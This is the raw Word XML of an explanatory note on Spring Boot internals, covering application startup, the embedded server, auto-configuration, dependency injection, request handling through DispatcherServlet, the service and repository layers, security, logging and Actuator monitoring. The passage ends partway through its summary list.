    <w:p w14:paraId="09309AF7" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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nentScan: Tells Spring to scan for other components in the current package and its sub-packages to register beans automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B5ACE1" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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pringApplication.run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB60196"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pringApplication.run() method is used to bootstrap the Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D67CD21"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22354B93" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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itializes the Spring context (ApplicationContext).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0FF0C" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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rts the embedded server (Tomcat, Jetty, or Undertow by default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865557D" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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uns the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D6610"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is typically the entry point:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359162DB"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lic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A4CE4"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pringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B49ECB"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3D3CB507" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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Embedded Web Server (Tomcat, Jetty, Undertow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF99ADE"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y default, Spring Boot uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the embedded web server. You can configure other web servers like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jetty</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Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB721DE"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run the application, the embedded web server starts and listens for incoming HTTP requests on the specified port (default is 8080).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029B3F15"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Boot takes care of setting up the embedded server, so you don't need to configure it manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFBECE" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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Auto-Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D7A4D3"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pring Boot’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature is the heart of its simplicity and productivity. It tries to automatically configure various parts of the application based on the libraries that are in the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB2825"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For example, if </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is on the classpath and a datasource is defined, Spring Boot auto-configures the EntityManagerFactory and DataSource beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659FBFB9"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f there is no custom configuration, Spring Boot will apply default configuration, such as using an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>embedded H2 database</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H2 console</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B0375"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uses the @EnableAutoConfiguration annotation internally to scan the application for specific configurations and apply relevant ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1084E2" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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Spring Context (ApplicationContext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6A2B9"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pplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the central interface to interact with the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D7E21"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is responsible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bean creation</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dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC998D"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l beans defined in the project (via annotations like @Component, @Service, @Repository, etc.) are managed in the Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B565E"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the application starts, Spring Boot initializes the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and wires up all the necessary beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D2B10" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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 Bean Instantiation and Dependency Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213A0518"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ans</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into various components (like controllers, services, and repositories) via the @Autowired annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E21BFF"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pring Boot uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constructor injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>field injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide dependencies into the beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258DAE9"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beans are managed by Spring’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inversion of Control (IoC) container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which means Spring is responsible for creating, wiring, and managing the lifecycle of these objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2C4E2" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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 Request Handling (DispatcherServlet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D7DA56"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pring Boot follows the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model of request handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DFE39D"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DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acts as the front controller in Spring MVC and is responsible for processing all HTTP requests, forwarding them to appropriate handlers, and returning responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BFE16"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t routes incoming HTTP requests to the corresponding </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on URL mappings (@RequestMapping, @GetMapping, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABF7C2B"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RestController or @Controller annotations define the endpoints (routes) for the incoming HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0B3FDC" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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7. Handler Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9DA447"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DispatcherServlet uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to map requests to controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B40AF6"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andlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to find the right handler (controller method) for an incoming request based on the URL path and HTTP method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D157109" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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8. Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E2ECE"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Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Java class annotated with @RestController or @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717641B7"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controller method is mapped to specific routes (URLs) using annotations like @GetMapping, @PostMapping, @RequestMapping, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C4021D"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controller’s job is to process the HTTP request, interact with services or repositories if necessary, and return the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A91FD75" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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9. Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB55310"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Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> layer is typically annotated with @Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20405353"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contains business logic and acts as an intermediary between the controller and the data layer (repositories).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC947B4"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service methods are invoked by the controller methods to perform the necessary business operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD0B934" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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0. Repository Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DE08C"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e </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> layer is where the application interacts with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C40FE"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Data JPA provides the JpaRepository interface that simplifies data access. The repository contains methods for CRUD operations, which are automatically implemented by Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D5F37E"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Boot integrates JPA repositories with the application context and auto-configures them based on the application’s settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEAEA7C" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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1. Transaction Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523287D0"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Boot handles transaction management via the @Transactional annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77911E8F"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ensures that multiple database operations are executed within a single transaction, which can either be committed or rolled back based on the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E58A6" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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2. Security (Spring Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ABA627"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pring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for handling authentication and authorization in Spring Boot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49121BCE"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Boot auto-configures default security settings and provides easy ways to secure your endpoints using @EnableWebSecurity or custom security configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C18E91"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 easily configure JWT, OAuth2, and other security mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A873D9F" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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3. Exception Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1153DAA6"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Boot provides a global exception handling mechanism using @ControllerAdvice and @ExceptionHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F7DCA2"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It allows you to define custom error responses for different exception types (e.g., 404 Not Found, 500 Internal Server Error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D813E2"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REST APIs, you can return a custom error message in JSON format using @RestControllerAdvice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777FA78E" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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4. Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BE659"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pring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> comes with logging capabilities out of the box (using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SLF4J</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Logback</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Log4j2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0D699"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 configure logging levels and appenders through application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C58593"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Boot provides default log configurations, and you can customize them as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA211A5" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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5. Actuators and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678BDE73"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pring Boot includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Actuator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support, which provides endpoints for monitoring and managing the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1D71D"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mon endpoints like /actuator/health, /actuator/metrics, and /actuator/env are available to check the health of the application, gather metrics, and see environment properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22065E9C"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 add custom health indicators and configure the endpoints as per your requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69684FE0" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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6. Shutdown Hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CD2FF8"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y default, Spring Boot applications gracefully shut down when the JVM is shutting down. This is handled via the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shutdown hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B63701"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 also control the shutdown behavior through configuration properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4468E925" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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ummary of Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C50ABC"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art Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SpringApplication.run() initializes the Spring context and the embedded server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D397D0E"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Auto-Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot automatically configures beans based on the classpath and properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117F42C1"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Bean Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
